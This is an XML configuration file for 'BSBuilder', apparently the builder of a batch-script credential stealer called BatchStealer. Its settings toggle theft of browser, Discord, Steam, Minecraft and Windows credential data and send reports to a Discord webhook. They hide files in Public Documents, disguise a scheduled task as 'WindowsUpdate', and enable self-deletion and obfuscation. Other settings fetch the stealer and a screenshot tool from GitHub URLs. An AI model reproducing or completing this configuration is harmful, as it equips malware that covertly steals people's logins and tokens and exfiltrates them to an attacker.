<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="BSBuilder.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
    </startup>
    <userSettings>
        <BSBuilder.Properties.Settings>
            <setting name="acceptTOS" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="startadmin" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="systeminfo" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="tasklist" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="netuser" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="quser" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="cmdkey" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="chrome" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="opera" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="vivaldi" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="firefox" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="osu" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="discord" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="steam" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="minecraft" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="growtopia" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="recurring" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="selfdelete" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="optimize" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="obfuscate" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="webhook" serializeAs="String">
                <value>https://discord.com/api/webhooks/</value>
            </setting>
            <setting name="reportstartmsg" serializeAs="String">
                <value>```[Report from %USERNAME% - %NetworkIP%]\nLocal time: %HH24%:%MI%```</value>
            </setting>
            <setting name="reportendmsg" serializeAs="String">
                <value>```Batch Scheduled: %recurring%\n[End of report]```</value>
            </setting>
            <setting name="hidepath" serializeAs="String">
                <value>C:\Users\Public\Documents</value>
            </setting>
            <setting name="whenscheduled" serializeAs="String">
                <value>Daily</value>
            </setting>
            <setting name="schedulename" serializeAs="String">
                <value>WindowsUpdate</value>
            </setting>
            <setting name="batchcopyname" serializeAs="String">
                <value>0.bat</value>
            </setting>
            <setting name="batchupdatername" serializeAs="String">
                <value>1.bat</value>
            </setting>
            <setting name="vbname" serializeAs="String">
                <value>0.vbs</value>
            </setting>
            <setting name="updateurl" serializeAs="String">
                <value />
            </setting>
            <setting name="targetusername" serializeAs="String">
                <value />
            </setting>
            <setting name="fetchurl" serializeAs="String">
                <value>https://raw.githubusercontent.com/Takaovi/BatchStealer/main/file.bat</value>
            </setting>
            <setting name="batchlocation" serializeAs="String">
                <value />
            </setting>
            <setting name="ipconfig" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="confuse" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="screenshot" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="screenshottoolurl" serializeAs="String">
                <value>https://github.com/chuntaro/screenshot-cmd/blob/master/screenshot.exe?raw=true</value>
            </setting>
            <setting name="scheduleFrequency" serializeAs="String">
                <value>0</value>
            </setting>
            <setting name="push" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="cert" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="certlayers" serializeAs="String">
                <value>1</value>
            </setting>
        </BSBuilder.Properties.Settings>
    </userSettings>
</configuration>